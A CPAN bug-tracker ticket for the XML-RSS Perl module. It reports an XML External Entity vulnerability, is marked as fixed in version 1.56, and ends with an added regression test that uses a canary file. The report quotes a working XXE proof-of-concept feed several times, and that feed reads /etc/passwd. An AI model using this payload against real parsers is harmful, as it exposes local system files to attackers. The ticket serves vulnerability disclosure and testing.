
This queue is for tickets about the XML-RSS CPAN distribution.

Report information
The Basics
Id: 100660
Status: resolved
Priority: 0/
Queue: XML-RSS

People
Owner: Nobody in particular
Requestors: MCARDWELL [...] cpan.org
Cc:
AdminCc:

Bug Information
Severity: (no value)
Broken in: (no value)
Fixed in: (no value)



Subject: XML External Entities Vulnerability
This module is vulnerable to an XML External Entities Exploit, as described here:

http://mikeknoop.com/lxml-xxe-exploit/

Try parsing the following feed on a Linux system and you'll see the contents of your /etc/passwd included in the output:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>

This was originally reported for XML::Feed at https://github.com/davorg/xml-feed/issues/15 and they pointed me in this direction.

On Tue Dec 02 06:28:40 2014, MCARDWELL wrote:
> This module is vulnerable to an XML External Entities Exploit, as
> described here:
>
> http://mikeknoop.com/lxml-xxe-exploit/
>
> Try parsing the following feed on a Linux system and you'll see the
> contents of your /etc/passwd included in the output:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <!DOCTYPE title [ <!ELEMENT title ANY >
> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
> <channel>
> <title>The Blog</title>
> <link>http://example.com/</link>
> <description>A blog about things</description>
> <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
> <item>
> <title>&xxe;</title>
> <link>http://example.com</link>
> <description>a post</description>
> <author>author@example.com</author>
> <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
> </item>
> </channel>
> </rss>
>
> This was originally reported for XML::Feed at
> https://github.com/davorg/xml-feed/issues/15 and they pointed me in
> this direction.

Hi, thanks for the report, I'll look into it in the future. In the meanwhile, a patch adding a failing test or a pull request with the complete fix will be appreciated:

https://github.com/shlomif/perl-XML-RSS/

Hi! This was fixed in XML-RSS-1.56. RESOLVEing.

Regards,

-- Shlomi Fish

On Thu Dec 04 10:29:20 2014, SHLOMIF wrote:
> On Tue Dec 02 06:28:40 2014, MCARDWELL wrote:
> > This module is vulnerable to an XML External Entities Exploit, as
> > described here:
> >
> > http://mikeknoop.com/lxml-xxe-exploit/
> >
> > Try parsing the following feed on a Linux system and you'll see the
> > contents of your /etc/passwd included in the output:
> >
> > <?xml version="1.0" encoding="UTF-8"?>
> > <!DOCTYPE title [ <!ELEMENT title ANY >
> > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
> > <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
> > <channel>
> > <title>The Blog</title>
> > <link>http://example.com/</link>
> > <description>A blog about things</description>
> > <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
> > <item>
> > <title>&xxe;</title>
> > <link>http://example.com</link>
> > <description>a post</description>
> > <author>author@example.com</author>
> > <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
> > </item>
> > </channel>
> > </rss>
> >
> > This was originally reported for XML::Feed at
> > https://github.com/davorg/xml-feed/issues/15 and they pointed me in
> > this direction.
>
> Hi, thanks for the report, I'll look into it in the future. In the
> meanwhile, a patch adding a failing test or a pull request with the
> complete fix will be appreciated:
>
> https://github.com/shlomif/perl-XML-RSS/
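
A regression check of the kind the maintainer asked for, written as an added example; it is not code from this ticket or from the XML-RSS distribution. It assumes a Unix-style temporary path and points the external entity at a constructed canary file instead of /etc/passwd, so it passes when the installed XML::RSS either rejects the feed or leaves the entity unexpanded.

```perl
#!/usr/bin/perl
# Added example: checks that the installed XML::RSS does not pull
# external-entity content into a parsed feed.
use strict;
use warnings;
use Test::More tests => 1;
use File::Temp qw(tempfile);
use XML::RSS;

# Constructed canary file standing in for a sensitive local file.
my $marker = 'XXE-CANARY-' . $$ . '-' . time;
my ($fh, $path) = tempfile(UNLINK => 1);
print {$fh} $marker;
close $fh or die "close: $!";

# Constructed feed modelled on the one in the report; the entity
# targets the canary file only.
my $feed = <<"XML";
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file://$path" >]>
<rss version="2.0">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
</item>
</channel>
</rss>
XML

my $rss    = XML::RSS->new;
my $parsed = eval { $rss->parse($feed); 1 };

# A parse failure is a safe outcome. If parsing succeeded, look for the
# canary in the item titles and in the re-serialized feed.
my $leaked = 0;
if ($parsed) {
    my $seen = join "\n", map { $_->{title} // '' } @{ $rss->{items} || [] };
    $seen .= eval { $rss->as_string } // '';
    $leaked = index($seen, $marker) >= 0 ? 1 : 0;
}
ok(!$leaked, 'external entity content does not reach the parsed feed');
```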